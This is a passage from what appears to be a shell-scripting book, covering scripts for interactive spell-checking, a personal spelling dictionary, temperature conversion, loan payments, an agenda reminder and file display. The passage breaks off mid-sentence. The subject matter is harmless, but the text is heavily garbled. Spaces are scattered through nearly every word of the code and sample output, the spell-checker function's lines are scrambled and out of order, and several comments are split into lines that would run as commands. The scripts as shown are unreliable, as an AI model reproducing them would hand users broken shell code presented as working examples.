ge tf ix ()
{
# As ks t he u ser to s p ec i f y a co r r ec t i on . If th e us e r e n t er s a r e pl a c em e nt w or d
# th at 's al s o m i ssp e l le d , t h e f u n ct i o n c a ll s i t s el f , w h i ch i s a le v e l 2 n e s ti ng .
# Th is c an g o a s de e p a s th e us e r m i g ht n ee d , b u t k e ep i n g t r ac k of n es t in g en ab les
# us t o ens u re t hat o nl y le v e l 1 ou t p ut s th e " r e pl a c in g wo r d " m e ss a g e.
wo rd =$ 1
fi le na me= $ 2
mi ss pe lle d =1
wh il e [ $ m iss p ell e d - e q 1 ]
do
ec ho "" ; ec h o " $ { bo l d on } M is s p el l e d w o rd ${ w o rd } : ${ b o ld o f f} "
gr ep -n $wo r d $ f i le n a me |
sed -e ' s/^ /
/ ' - e "s / $ wo r d /$ b o ld o n$ w o rd $ b ol d o ff / g "
ec ho -n "i) g nor e , q ) u it , or t yp e re p l ac e me n t : "
re ad fi x
if [ "$ f ix" = " q " - o "$ f i x" = " q u it " ] ; t h e n
ec ho " Exi t ing w it h o ut a pp l y in g an y fi x es . " ; e x it 0
el if [ " ${f i x%$ { f ix # ? }} " = " ! " ] ; t h en
mi ssp e lle d =0
# u se r fo r c in g re p l ac e me n t , s t op c he c k in g
ec ho " s/$ w ord / $ {f i x #? } / g" > > $ c ha n g er e qu e s ts
el if [ " $fi x " = " i" - o - z " $ f ix " ] ; th e n
mi ssp e lle d =0
el se
if [ ! -z "$( e c ho $ fi x | s e d ' s /[ ^ ]/ / g' ) " ] ; t h e n
mis s pel l ed= 0
# o n c e w e s e e s p a ce s , w e s t o p c h ec k i ng
ech o "s / $wo r d /$ f i x/ g " > > $c h a ng e r eq u es t s
el se
# I t 's a si n g le - w or d re p l ac e m en t , l e t' s sp e l l- c h ec k th e re p l ac e me n t t oo
if [ ! - z " $ ( ec h o $ f i x | $s p e ll ) " ] ; t h en

fi
do ne

fi

e c ho " "
e c ho " *** Y ou r su g g es t e d r e pl a c em e nt $ fi x is m is s p el l e d. "
e c ho " *** P re f a ce t he w or d wi t h ' ! ' t o f o r ce a cc e p ta n c e. "
els e
m i ssp e lle d = 0 # s u g ge s t ed r ep l a ce m en t wo r d i s ac c e pt a b le
e c ho " s/$ w o rd / $ fi x / g" > > $ c ha n g er e qu e s ts
fi

## # Be gi nni n g o f ac t u al s cr i p t b o dy
if [ $ # -lt 1 ] ; t h e n
ec ho " Usa g e: $ 0 f i l en a m e" > &2 ; e x i t 1
fi
if [ ! - r $ 1 ] ; th e n
ec ho " $0: Can n ot r e ad f il e $1 t o c h ec k sp e ll i n g" > &2 ; e x i t 1
fi
# No te t hat the fol l o wi n g i n v oc a t io n fi l l s $ te m p fi l e a l o ng t he w ay
er ro rs =" $($ s pel l < $ 1 | t ee $ te m p fi l e | w c - l | se d 's / [ ^[ : d ig i t :] ] / /g ' )"
if [ $ er ror s -e q 0 ] ; t h en
ec ho " The r e a r e n o sp e l li n g e r r or s in $ 1. " ; e x it 0
fi
ec ho " We ne e d t o fi x $e r r or s mi s s pe l l in g s i n t h e d o c um e n t. R em e m be r th a t t h e"
ec ho " de fau l t a n swe r to t he s pe l l in g pr o m pt is ' ig n o re ' , i f yo u ' re l az y ."
to uc h $c han g ere q ues t s
fo r wo rd in $(c a t $ t e mp f i le )
do
ge tf ix $w o rd $ 1 1
do ne
if [ $ (w c - l < $ cha n g er e q ue s t s) - gt 0 ] ; t h en
se d -f $c h ang e req u e st s $1 > $ 1 . ne w
mv $ 1 $1. s hp
mv $ 1. new $1
ec ho D one . Ma d e $ ( w c - l < $ ch a n ge r e qu e s ts ) c h a ng e s .
fi
ex it 0

How It Works
The script itself revolves around the ge t f ix function, which shows each error in its context and then prompts the
user for either a correction or permission to ignore each error. The sophisticated conditionals in this script allow users to
type in either a correction for the reported misspelling, i to ignore the misspelling, or q to immediately quit the
program. Perhaps more interesting is that g e t fi x is interactive. It checks the spelling of the corrections that are
entered to ensure that you're not trading one misspelling for another. If the script thinks that the correction is a
misspelling too, you can force acceptance of the correction by prefacing it with the "!" character.
The fixes themselves are accumulated by a s e d script called $ c ha n ge r e qu e s ts , which is then used to apply the
corrections to the file once the user has finished reviewing all of the would-be mistakes.
Also worth mentioning is that the t r ap command at the beginning of the script ensures that any temp files are
removed. Finally, if you check the last few lines of the script, you'll note that the precorrected version of the file is saved
with a . sh p suffix, in case something goes wrong. Anticipating possible problems is always a wise policy, particularly
for scripts that munge input files.

Running the Script


To run this script, specify the filename to spell-check as a command argument.

The Results

$ sh pe ll ra g ged . txt
We n ee d to f ix 5 mi s s pe l l in g s i n th e do c u me n t. R em e m be r th a t t h e
de fa ul t ans w er t o t h e s p e ll i n g p r om p t i s 'i g no r e ', i f y o u' r e l a z y.
Mi ss pe ll ed w ord her r s el f :
1 :S o she sat on, w it h cl o s ed e ye s , a n d h a lf b el i e ve d he r r se l f i n
i) gn or e, q) u it, or t y pe r ep l a ce m e nt : he r s el f
Mi ss pe ll ed w ord rei p p li n g :
3 :a ll wo u ld c han g e t o du l l r e a li t y -- t h e g ra s s w o u ld b e o n ly r us t l in g i n th e
wi nd , an d t h e p o ol r e ip p l in g to t he w av i n g o f t h e r e ed s - -t h e
i) gn or e, q) u it, or t y pe r ep l a ce m e nt : ri p p li n g
Mi ss pe ll ed w ord tea c u ps :
4 :r at tli n g t e acu p s w o u ld c ha n g e t o t i n kl i ng s he e p -b e l ls , an d th e
i) gn or e, q) u it, or t y pe r ep l a ce m e nt :
Mi ss pe ll ed w ord Gry p h on :
7 :o f the bab y , t h e s h r ie k of t he G ry p h on , a n d a l l t h e o t h er q ue e r n o is e s , wo uld
ch an ge ( she kne w )
i) gn or e, q) u it, or t y pe r ep l a ce m e nt :
Mi ss pe ll ed w ord cla m o ur :
8 :t o the con f use d cl a m ou r of t he b us y fa r m- y a rd - - wh i l e t h e l o wi n g o f
i) gn or e, q) u it, or t y pe r ep l a ce m e nt :
Do ne . Ma de 2 ch a nge s .
It's impossible to reproduce here in the book, but the ANSI color sequences let the misspelled words stand out in the
output display.

#27 Adding a Local Dictionary to Spell


Missing in both Script #25 and Script #26, and certainly missing in most spell-check implementations on stock Unix
distributions, is the ability for a user to add words to a personal spelling dictionary so that they're not flagged over and
over again. Fortunately, adding this feature is straightforward.

The Code
# !/ bin / sh
# s pel l dic t - U se s th e 'a spell ' fe a t ure a nd s om e f il t er i ng t o a ll o w ea s y
#
c o mma nd -li ne spe ll-c hecki n g o f a g i v en i np u t fi l e.
# I nev i tab ly yo u' ll f ind that t her e are w or ds i t f la g s a s wr o ng b u t
# y ou t hin k are f ine. Sim ply s a ve t h em i n a f il e , on e p e r li n e, a n d
# e nsu r e t ha t t he var iabl e 'ok a ywo r d s' p o in ts t o t ha t f i le .
o ka ywo r ds= "$ HOM E/ okay word s"
t em pou t ="/ tm p/s pe ll.t mp.$ $"
s pe ll= " asp el l"

# t w eak a s ne ed e d

t ra p " / bin /r m - f $tem pout " EXI T


i f [ - z "$ 1" ] ; then
e cho "Us ag e: sp ell file |URL" >&2 ; exi t 1
e li f [ ! - f $ok ay word s ] ; the n
e cho "No p ers on al d icti onary fou n d . C r e at e on e a nd re r un t h is c o mm an d " >& 2
e cho "Yo ur di ct iona ry f ile: $ oka y w ord s " > &2
e xit 1
fi
f or fi l ena me
do
$ spe l l - a < $ fi lena me | \
g rep -v '@ (#) ' | se d "s /\'// g " | \
a w k ' { if (l engt h($0 ) > 1 5 && l eng t h ($ 2) > 2) p r in t $ 2 } ' | \
gre p -v if $o ka ywor ds | \
gre p '[ [: low er :]]' | g rep - v '[ [ : dig i t :] ]' | so rt -u | \
sed 's/ ^/
/' > $ temp out
if [ -s $ tem po ut ] ; t hen
s e d " s/ ^/$ {f ilen ame} : /" $ tem p o ut
fi
d on e
e xi t 0

How It Works
Following the model of the Microsoft Office spell-checking feature, this script not only supports a user-defined dictionary
of correctly spelled words that the spell-checking program would otherwise think are wrong, it also ignores words that
are in all uppercase (because they're probably acronyms) and words that contain a digit.
This particular script is written to use aspel l , which interprets the - a flag to mean that it's running in pass-through
mode, in which it reads s td in for words, checks them, and outputs only those that it believes are misspelled. The
i sp ell command also requires the -a flag, and many other spell-check commands are smart enough to
automatically ascertain that std in isn't the keyboard and there-fore should be scanned. If you have a different spellcheck utility on your system, read the man page to identify which flag or flags are necessary.

Running the Script


This script requires one or more filenames to be specified on the command line.

The Results

First off, with an empty personal dictionary and the excerpt from Alice in Wonderland seen previously, here's what
happens:
$ s pel l dic t rag ge d.tx t
r ag ged . txt :
he rrse lf
r ag ged . txt :
te acup s
r ag ged . txt :
Gr ypho n
r ag ged . txt :
cl amou r
Two of those are not misspellings, so I'm going to add them to my personal spelling dictionary by using the ec ho
command to append them to the oka ywor ds file:
$ e cho "Gr yp hon " >> ~ /.ok aywor d s
$ e cho "te ac ups " >> ~ /.ok aywor d s
Here are the results of checking the file with the expanded spelling dictionary:
$ s pel l dic t rag ge d.tx t
r ag ged . txt :
he rrse lf
r ag ged . txt :
cl amou r

#28 Converting Temperatures


This script works with a variety of mathematical formulas, and an unusual input format, to translate between
Fahrenheit, Celsius, and Kelvin. It's the first use of sophisticated mathematics within a script in this book, and you'll see
where the experimentation in Script #9 that produced s c rip t b c proves a tremendous boon, as the same concept of
piping an equation to bc shows up again here.

The Code
# !/ bin / sh
# c onv e rta te mp - Temp erat ure c o nve r s ion s cr ip t t ha t l et s t he us er en te r
#
a t emp er atu re in Fahr enhei t , C e l siu s , o r Ke l vi n a nd re ce i ve t h e
#
eq u iva le nt te mper atur e in t he o t her t wo u ni t s as th e o ut p ut .
i f [ $ # -e q 0 ] ; the n
c at < < E OF >& 2
U sa ge: $0 te mpe ra ture [F|C |K]
w he re t he su ffi x:
F
in di cat es inp ut i s in F ahr e n hei t (d ef au l t)
C
in di cat es inp ut i s in C els i u s
K
in di cat es inp ut i s in K elv i n
E OF
e xit 1
fi
u ni t=" $ (ec ho $1 |s ed - e 's /[-[[ : dig i t :]] * / /g ' | t r '[ : lo w er :] ' ' [: u pp er : ]' ) "
t em p=" $ (ec ho $1 |s ed - e 's /[^-[ [ :di g i t:] ] * // g' )"
c as e $ { uni t: =F}
in
F ) # F ah ren he it t o Ce lsius for m u la: T c = (F - 32 ) / 1. 8
far n ="$ te mp"
cel s ="$ (e cho " scal e=2; ($far n - 3 2 ) / 1 .8 " | b c) "
kel v ="$ (e cho " scal e=2; $cels + 2 7 3 .15 " | bc )"
;;
C ) # C el siu s to F ahre nheit for m u la: T f = (9 / 5) *T c +3 2
cel s =$t em p
kel v ="$ (e cho " scal e=2; $cels + 2 7 3 .15 " | bc )"
far n ="$ (e cho " scal e=2; ((9/5 ) * $ c els ) + 32 " | b c) "
;;
K ) # C el siu s = Ke lvin - 27 3 .15 , the n us e Ce l s -> Fa h r fo r mu la
kel v =$t em p
cel s ="$ (e cho " scal e=2; $kel v - 2 7 3.1 5 " | b c) "
far n ="$ (e cho " scal e=2; ((9/ 5 ) * $ cel s ) + 3 2" | bc ) "
e sa c
e ch o " F ahr en hei t = $f arn"
e ch o " C els iu s
= $c els"
e ch o " K elv in
= $k elv"
e xi t 0

Running the Script


I really like this script because I like the intuitive nature of the input format, even if it is pretty unusual for a Unix
command. Input is entered as a numeric value, with an optional suffix that indicates the units of the temperature
entered. To see the Celsius and Kelvin equivalents of the temperature 100 degrees Fahrenheit, enter 100F. To see
what 100 degrees Kelvin is equivalent to in Fahrenheit and Celsius, use 100K. If no unit suffix is entered, this script
works with Fahrenheit temperatures by default.
You'll see this same logical single-letter suffix approach again in Script #66, which converts currency values.

The Results
$ c onv e rta te mp 21 2
F ah ren h eit = 21 2
C el siu s
= 10 0. 00
K el vin
= 37 3. 15
$ c onv e rta te mp 10 0C
F ah ren h eit = 21 2. 00
C el siu s
= 10 0
K el vin
= 37 3. 15
$ c onv e rta te mp 10 0K
F ah ren h eit = -2 79 .67
C el siu s
= -1 73 .15
K el vin
= 10 0

Hacking the Script


A few input flags that would generate a succinct output format suitable for use in other scripts would be a useful
addition to this script. Something like conve r tat e m p -c 1 0 0f could output the Celsius equivalent of 100 degrees
Fahrenheit.

#29 Calculating Loan Payments


In addition to temperature conversion, another common calculation for your users might well deal with estimating the
size of loan payments. This script helps answer the question, "What can I do with that bonus?" at least when things
are going well.
While the formula to calculate payments based on the principal, interest rate, and duration of the loan is a bit tricky,
some judicious use of shell variables tames the beast and makes it surprisingly understandable too.

The Code
# !/ bin / sh
#
#

loa n cal c - G iv en a pri ncipa l lo a n am o u nt , in t er es t r a te , a nd


d u rat io n o f loan (ye ars), cal c u lat e s t he p e r- pa y me n t am o un t.

# F orm u la is :
M = P * ( J / ( 1 - ( 1 + J ) ** - N ))
#
w h ere P = pr inci pal, J = m ont h l y i n t er es t r at e, N = d ur a ti on (m on t hs )
#
# U ser s ty pi cal ly ent er P , I ( a nnu a l in t e re st r a te ), an d L ( l en gt h , ye a rs )
. s cri p t-l ib rar y. sh
i f [ $ # -n e 3 ] ; the n
e cho "Us ag e: $0 pri ncip al in t ere s t lo a n -d ur at i on -y e ar s " >& 2
e xit 1
fi
P =$ 1
I =$2
L= $3
J =" $(s c rip tb c - p 8 $I / \ (12 \ * 10 0 \) ) "
N =" $(( $L * 12 )) "
M =" $(s c rip tb c - p 8 $P \* \($J / \( 1 - \ ( 1 + $ J\ ) \ ^ - $N \ ) \) )"
# N ow a li tt le pr etty ing up of the v alu e :
d ol lar s ="$ (e cho $ M | cut -d. - f 1)"
c en ts= " $(e ch o $ M | cu t -d . -f2 | c u t -c 1 - 2) "
c at << EOF
A $ L y e ar lo an at $I% int erest wit h a p r i nc ip al am ou n t o f $( n ic en u mb er $P 1 )
r es ult s in a pa ym ent of \ $$dol l ars . $ cen t s e ac h m on th fo r t he du ra t io n o f
t he lo a n ( $N pa ym ents ).
E OF
e xi t 0

Running the Script


This minimalist script expects three parameters to be specified: the amount of the loan, the interest rate, and the
duration of the loan (in years).

The Results
I've been eyeing a lovely new Volvo XC90, and I'm curious how much my payments would be if I bought the car. The
Volvo is about $40,000 out the door, and the latest interest rates are running at 6.75 percent for an auto loan. I'd like
to see how much difference there is in total payments between a four-year and five-year car loan. Easily done:
$ l oan c alc 4 000 0 6.75 4
A 4 ye a r l oa n a t 6.75 % in teres t wi t h a p r in ci pa l a mo u nt of 4 0 ,0 00
r es ult s in a pa ym ent of $ 953.2 1 ea c h mo n t h fo r t he d u ra t io n o f
t he lo a n ( 48 pa ym ents ).
$ l oan c alc 4 000 0 6.75 5
A 5 ye a r l oa n a t 6.75 % in teres t wi t h a p r in ci pa l a mo u nt of 4 0 ,0 00
r es ult s in a pa ym ent of $ 787.3 3 ea c h mo n t h fo r t he d u ra t io n o f
t he lo a n ( 60 pa ym ents ).

If I can afford the slightly higher payments on the four-year loan, the car will be paid off and the overall amount of the
loan (payment * number of payments) will be significantly cheaper. To calculate the exact savings, I can use Script #24,
the interactive calculator:
$ c alc '(7 87 .33 * 60) - ( 953.2 1 * 4 8 )'
1 48 5.7 2
This seems like a worthwhile savings. $1,485.72 would buy a nice little laptop!

Hacking the Script


Exploring the formula itself is beyond the scope of this book, but it's worth noting how even a complex mathematical
formula can be implemented directly in a shell script.
The entire calculation could be solved using a single input stream to b c , because that program also supports variables.
However, being able to manipulate the intermediate values within the script itself proves beyond the capabilities of the
b c command alone. For an example of just such a manipulation, here is the code that splits the resultant monthly
payment value and ensures that it's presented as a properly formatted monetary value:
d ol lar s ="$ (e cho $ M | cut -d. - f 1)"
c en ts= " $(e ch o $ M | cu t -d . -f2 | c u t -c 1 - 2) "
As it does in so many scripts in this book, the c u t command proves tremendously useful here. The second line of this
code grabs the portion of the monthly payment value that follows the decimal point and then chops off anything after
the second character. Ideally, this modification would round up or down according to the value of the third cents
character, rather than doing what is considered a floor function. And this change is surprisingly easy to accomplish:
Just add 0.005 cents to the value before truncating the cents amount at two digits.
This script could also really do with a way to prompt for each field if no parameters are specified. And a more
sophisticated and useful version of this script would let a user specify any three parameters of the four (principal,
interest rate, number of payments, and monthly payment amount) and have the script solve for the fourth value. That
way, if you knew you could afford only $500 per month in payments, and that the maximum duration of a 6 percent
auto loan was five years, you could ascertain the largest amount of principal that you could borrow.

#30 Keeping Track of Events


This script is actually two scripts that implement a simple calendar program. The first script, ad d ag en d a, enables you
to specify either the day of the week or the day and month for recurring events, or the day, month, and year for onetime events. All the dates are validated and saved, along with a one-line event description, in an . ag en d a file in your
home directory. The second script, ag enda, checks all known events, showing which are scheduled for the current
date.
I find this kind of tool particularly useful for remembering birthdays and anniversaries. It saves me a lot of grief!

The Code
# !/ bin / sh
# a dda g end a - P ro mpts the user to a d d a n ew e ve n t fo r t h e ag e nd a s cr ip t .
a ge nda f ile =" $HO ME /.ag enda "
i sD ayN a me( )
{
# re t urn = 0 if all is well, 1 o n err o r

c ase $(e ch o $ 1 | tr '[[ :uppe r :]] ' '[[ : l ow er :] ] ') i n


sun * |mo n* |tu e* |wed *|th u*|fr i *|s a t *) r e tv al =0 ;;
*) r etv al =1 ;;
e sac
r etu r n $ re tva l

i sM ont h Nam e( )
{
ca s e $ (e cho $ 1 | tr ' [[:up p er: ] ] ' ' [ [ :l ow er : ]] ') in
j an* |f eb* |m ar*| apr* |may* | jun * )
r et ur n 0
;;
j ul* |a ug* |s ep*| oct* |nov* | dec * )
r et ur n 0
;;
* ) r et urn 1
;;
es a c
}
n or mal i ze( )
{
# Re t urn s tri ng wit h fi rst c h ar u p per c a se , ne x t tw o l o we rc a se
e cho -n $1 | cu t -c 1 | tr ' [ [:l o w er: ] ] ' '[ [: u pp er : ]] '
e cho
$1 | cu t -c2- 3| t r '[[ : upp e r :]] ' '[ [: lo w er :] ] '
}
i f [ ! -w $H OME ] ; t hen
e cho "$0 : can no t wr ite in yo u r h o m e d i r ec to ry ($ HO M E) " > &2
e xit 1
fi
e ch o " A gen da : T he Uni x Re minde r Se r v ice "
e ch o - n "D at e o f even t (d ay mo n , d a y mo n t h ye ar , o r d ay n am e) : "
r ea d w o rd1 w ord 2 word 3 ju nk
i f isD a yNa me $w or d1 ; the n
i f [ ! - z "$w or d2" ] ; then
ec h o " Ba d d ay name for mat: j ust s pec i f y th e d ay n a me by i t se lf . " >& 2
ex i t 1
fi
d ate = "$( no rma li ze $ word 1)"
e ls e
i f [ -z "$ wor d2 " ] ; th en
ec h o " Ba d d ay name for mat: u nkn o w n d a y n am e s pe ci f ie d " >& 2

fi

ex i t 1

i f [ ! - z "$( ec ho $ word 1|sed 's/ [ [ :di g i t: ]] // g ') " ]


; t he n
ec h o " Ba d d at e fo rmat : ple a se s p eci f y d ay f i rs t, by da y n um be r " >& 2
ex i t 1
fi
i f [ "$w or d1" - lt 1 -o "$wor d 1" - g t 3 1 ] ; th e n
ec h o " Ba d d at e fo rmat : day num b e r c a n o nl y b e in ra n ge 1 - 31 " > &2
ex i t 1
fi
i f ! isM on thN am e $w ord2 ; th e n
ec h o " Ba d d at e fo rmat : unk n own m ont h na me s p ec if i ed . " >& 2
ex i t 1
fi
w ord 2 ="$ (n orm al ize $wor d2)"

fi

i f [ -z "$ wor d3 " ] ; th en


da t e=" $w ord 1$ word 2"
e lse
if [ ! - z " $( echo $wo rd3|s e d ' s / [[: d i gi t: ]] / /g ') " ] ; th e n
e cho " Bad d ate form at: t h ird f iel d sh ou ld be y e ar . " >& 2
e xit 1
el i f [ $ wor d3 -lt 200 0 -o $ wor d 3 -g t 25 00 ] ; th e n
e cho " Bad d ate form at: y e ar v a lue s ho ul d b e 20 0 0- 2 50 0" >& 2
e xit 1
fi
da t e=" $w ord 1$ word 2$wo rd3"
fi

e ch o - n "O ne -li ne des crip tion: "


r ea d d e scr ip tio n
# R ead y to w rit e to d ata file
e ch o " $ (ec ho $d at e|se d 's / //g ' )|$ d e scr i p ti on " > > $a g en d af il e
e xi t 0
The second script is shorter but is used more often:
# !/ bin / sh
# a gen d a - S can s thro ugh the u s er' s .ag e n da f il e t o s ee if t h er e
#
ar e an y mat ch es f or t he cu r ren t or n e xt d ay .
a ge nda f ile =" $HO ME /.ag enda "
c he ckD a te( )
{
# Cr e ate t he po ssib le d efaul t va l u es t h at 'l l m at ch to d ay
w eek d ay= $1
da y=$2
m onth= $ 3
y ear = $ 4
f orm a t1= "$ wee kd ay"
fo rmat2 = "$d a y $mo n t h"
f o rm at 3 =" $ da y$ m on th $ ye ar "
# an d st ep th ro ugh the file c omp a r ing d at es .. .
I FS= " |"

# the rea ds wi l l n a t ura l l y sp li t a t t he IF S

e cho "On t he Ag enda for toda y :"

w hil e re ad da te des crip tion ; do


if [ " $d ate " = "$ form at1" - o " $ d ate " = "$ fo r ma t2 " - o " $d a te " = " $f o rm at 3 " ]
th e n
e cho "
$ de scri ptio n"
fi
d one < $ ag end af ile

if [ !
e cho
e cho
e xit
fi

-e $a gen da file ] ; then


"$0 : You d on't see m to h ave a n . a g en da f i le . " > & 2
"To r eme dy thi s, p lease use ' add a g en da ' t o ad d e v en ts " > &2
1

# N ow l et' s get t oday 's d ate.. .


e va l $ ( dat e "+w ee kday =\"% a\" m o nth = \ "%b \ " d ay =\ " %e \" ye a r= \" % G\ "" )
d ay ="$ ( ech o $da y| sed 's/ //g') " # r e mov e po ss ib l e le a di n g sp a ce
c he ckD a te $w eek da y $d ay $ month $ye a r
e xi t 0

How It Works
The age n da script supports three types of recurring events: weekly events (e.g., every Wednesday), annual events
(e.g., every August 3), and one-time events (e.g., 1 January, 2010). As entries are added to the agenda file, their
specified dates are normalized and compressed so that 3 August becomes 3Aug, and Thursday becomes Thu. This is
accomplished with the n or mali ze function:
n or mal i ze( )
{
# Re t urn s tri ng wit h fi rst c h ar u p per c a se , ne x t tw o l o we rc a se
e cho -n $1 | cu t -c 1 | tr ' [ [:l o w er: ] ] ' '[ [: u pp er : ]] '
e cho $1 | cut - c2-3 | tr '[[: u ppe r : ]]' ' [[ :l ow e r: ]] '
}
This chops any value entered down to three characters, ensuring that the first is uppercase and the second and third
are lowercase. This format matches the standard abbreviated day and month name values from the da t e command
output, which is critical for the correct functioning of the a g end a script.
The age n da script checks for events by taking the current date and transforming it into the three possible date string
formats (dayname, day+month, and day+month+year). It then simply compares each of these date strings to each line
in the .a g end a data file. If there's a match, that event is shown to the user. While long, the a dd a ge nd a script has
nothing particularly complex happening in it.
In my opinion, the coolest hack is how an e va l is used to assign variables to each of the four date values needed:
e va l $ ( dat e "+w ee kday =\"% a\" m o nth = \ "%b \ " d ay =\ " %e \" ye a r= \" % G\ "" )
It's also possible to extract the values one by one (for example, we e kd a y= "$ ( da t e +% a) " ), but in very rare cases
this method can fail if the date rolls over to a new day in the middle of the four d at e invocations, so a succinct single
invocation is preferable. In either case, unfortunately, d a te returns a day number with either a leading zero or a
leading space, neither of which is desired. So the line of code immediately subsequent to the line just shown strips the
leading space from the value, if present, before proceeding.

Running the Script


The add a gen da script prompts the user for the date of a new event. Then, if it accepts the date format, the script
prompts for a one-line description of the event.
The companion a ge nda script has no parameters and, when invoked, produces a list of all events scheduled for the
current date.

The Results
To see how this pair of scripts works, let's add a number of new events to the database:
$ a dda g end a
A ge nda : Th e Uni x Remi nder Serv i ce
D at e o f ev en t ( da y mo n, d ay mo n th y e ar, o r da yn a me ): 31 Oc to b er
O ne li n e d es cri pt ion: Hal lowee n
$ a dda g end a
A ge nda : Th e Uni x Remi nder Serv i ce
D at e o f ev en t ( da y mo n, d ay mo n th y e ar, o r da yn a me ): 30 Ma rc h
O ne li n e d es cri pt ion: Pen ultim a te d a y o f Ma rc h

$ a dda g end a
A ge nda : Th e Uni x Remi nder Serv i ce
D at e o f ev en t ( da y mo n, d ay mo n th y e ar, o r da yn a me ): Su n da y
O ne li n e d es cri pt ion: sle ep la t e ( h o pef u l ly )
$ a dda g end a
A ge nda : Th e Uni x Remi nder Serv i ce
D at e o f ev en t ( da y mo n, d ay mo n th y e ar, o r da yn a me ): ma r c 30 03
B ad da t e f or mat : plea se s pecif y da y fir s t , by d a y nu m be r
$ a dda g end a
A ge nda : Th e Uni x Remi nder Serv i ce
D at e o f ev en t ( da y mo n, d ay mo n th y e ar, o r da yn a me ): 30 ma rc h 2 00 3
O ne li n e d es cri pt ion: IM Marv t o s e e ab o u t di nn e r
Now the agen da script offers a quick and handy reminder of what's happening today:
$ a gen d a
O n the Age nd a f or tod ay:
P enu l tim at e d ay of Marc h
s lee p la te (h op eful ly)
I M M a rv to se e abou t di nner
Notice that it matched entries formatted as day+month, day of week, and day+month+year. For completeness, here's
the associated . ag end a file, with a few additional entries:
$ c at ~ /.a ge nda
1 4F eb| V ale nt ine 's Day
2 5D ec| C hri st mas
3 Au g|D a ve' s Bir th day
4 Ju l|I n dep en den ce Day (US A)
3 1O ct| H all ow een
3 0M ar| P enu lt ima te day of March
S un |sl e ep la te (h opef ully )
3 0M ar2 0 03| IM Ma rv to see about din n e r

Hacking the Script


This script really just scratches the surface of this complex and interesting topic. It'd be nice to have it look a few days
ahead, for example, which can be accomplished in the a gen d a script by doing some date math. If you have the GNU
d at e command, date math (e.g., today + 2 days) is easy. If you don't, well, it requires quite a complex script to
enable date math solely in the shell.
Another, perhaps easier hack would be to have ag e n da output Nothing scheduled for today when there are no
matches for the current date, rather than On the Agenda for today: and no further output.
Note that this script could also be used on a Unix box for sending out systemwide reminders about events like backup
schedules, company holidays, and employee birthdays. Simply have the a ge n da script on each user's machine point
to a shared read-only . age nd a file, and then add a call to the a ge n da script in each user's .l o gi n or similar file.

Chapter 4: Tweaking Unix


Overview
The outsider view of Unix suggests a nice, uniform command-line experience, helped along by the existence of and
compliance with the POSIX standards for Unix. But anyone who's ever touched more than one computer knows how
much they can vary within these broad parameters.
You'd be hard-pressed to find a Unix or Linux box that doesn't have l s as a standard command, for example, but
does your version support the -- colo r flag? Does your system use the older i ne t d package for launching
daemons, or does it use x inet d? Does your version of the Bourne shell support variable slicing (e.g.,
$ {v ar: 0 :2} )?
Perhaps one of the most valuable uses of shell scripts is to fix your particular flavor of Unix and make it more like other
flavors, in order to make your commands conform with those of different systems. Although most of the modern, fully
featured GNU utilities run just fine on non-Linux Unixes (so you can replace clunky old ta r binaries with the newer
GNU tar , for example), many times the system updates involved in tweaking Unix don't need to be so drastic and
don't need to introduce the potential problems inherent in adding new binaries to a supported system. Instead, shell
scripts can be used to map popular flags to their local equivalents, to use core Unix capabilities to create a smarter
version of an existing command, or even to address the longtime lack of a certain facility.

#31 Displaying a File with Line Numbers


There are a lot of ways to add line numbers to a displayed file, many of which are quite short. Here's a solution using
a wk :
a wk '{ pri nt NR ": "$0 }' < inp u tfi l e
On some Unix implementations, the c at command has an - n flag, and on others, the mo r e (or l e ss , or p g) pager
has a flag for specifying that each line of output should be numbered. But on some Unixes, none of these will work, in
which case the simple script given here can do the job.

The Code
# !/ bin / sh
# n umb e rli ne s - A sim ple alter n ati v e to c at - n, et c.
f or fi l ena me
do
l ine c oun t= "1"
w hil e re ad li ne
do
ec h o " ${ lin ec ount }: $ line"
li n eco un t=" $( ($li neco unt + 1)) "
d one < $ fi len am e
d on e
e xi t 0

Running the Script


You can feed as many filenames as you want to this script, but you can't feed it input via a pipe, though that wouldn't
be too hard to fix, if needed.

The Results
$ n umb e rli ne s t ex t.sn ippe t.txt
1 : Per h aps o ne of the mos t val u abl e use s of s he l l sc r ip t s is to f i x
2 : you r pa rt icu la r fl avor of U n ix a n d m a k e it m o re l i ke ot he r f la v or s,
3 : to b rin g you r comm ands into con f o rma n c e or t o i nc r ea s e co n si st e nc y
4 : acr o ss di ffe re nt s yste ms. T h e o u t sid e r v ie w o f Un i x s ug ge s ts a
5 : nic e , u ni for m comm and- line e xpe r i enc e , h el pe d a lo n g b y th e e xi s te nc e
6 : of a nd co mpl ia nce with the P OSI X sta n d ar ds f o r Un i x. Bu t a ny on e w ho ' s
7 : eve r to uc hed m ore than one c omp u t er k n ow s ho w m uc h t h ey c a n va r y
8 : wit h in th ese b road par amete r s.

Hacking the Script


Once you have a file with numbered lines, you can also reverse the order of all the lines in the file:
c at -n fil en ame | sor t -r n | c u t - c 8 This does the trick on systems supporting the -n flag to cu t , for example. Where might this be useful? One obvious
situation is when displaying a log file in most-recent-to-least-recent order.

#32 Displaying a File with Additional Information


Many of the most common Unix commands have evolved within slow-throughput, expensive output environments and
therefore offer minimal output and interactivity. An example is c a t: When used to view a short file, it really doesn't
have much helpful output. It would be nice to have more information about the file. This script, a more sophisticated
variation of Script #31, accomplishes this.

The Code
# !/ bin / sh
# s how f ile - Sh ow s th e co ntent s of a fi l e , in cl u di ng ad d it io n al u s ef ul in fo .
w id th= 7 2
f or in p ut
do
l ine s ="$ (w c - l < $i nput | se d 's / //g ' ) "
c har s ="$ (w c - c < $i nput | se d 's / //g ' ) "
o wne r ="$ (l s - ld $in put | awk '{p r i nt $ 3 }' )"
e cho "-- -- --- -- ---- ---- ----- - --- - - --- - - -- -- -- - -- -- - -- - -- -- - -- -- - -- -- - -- "
e cho "Fi le $i np ut ( $lin es li n es, $ cha r s c ha ra c te rs , o w ne d b y $o w ne r) : "
e cho "-- -- --- -- ---- ---- ----- - --- - - --- - - -- -- -- - -- -- - -- - -- -- - -- -- - -- -- - -- "
w hil e re ad li ne
do
i f [ $ {#l in e} - gt $ width ] ; t hen
ec ho "$ li ne" | fm t | s e d - e '1s / ^ / /' - e ' 2, $ s/ ^ /+ / '
e lse
ec ho " $l ine"
fi
do n e < $ inp ut
e cho "-- -- --- -- ---- ---- ----- - --- - - --- - - -- -- -- - -- -- - -- - -- -- - -- -- - -- -- - -- "
d on e | mor e
e xi t 0

How It Works
To simultaneously read the input line by line and add head and foot information, this script uses a handy shell trick:
Near the end of the script it redirects the input to the wh i l e loop with the snippet d o ne < $i np u t. Perhaps the
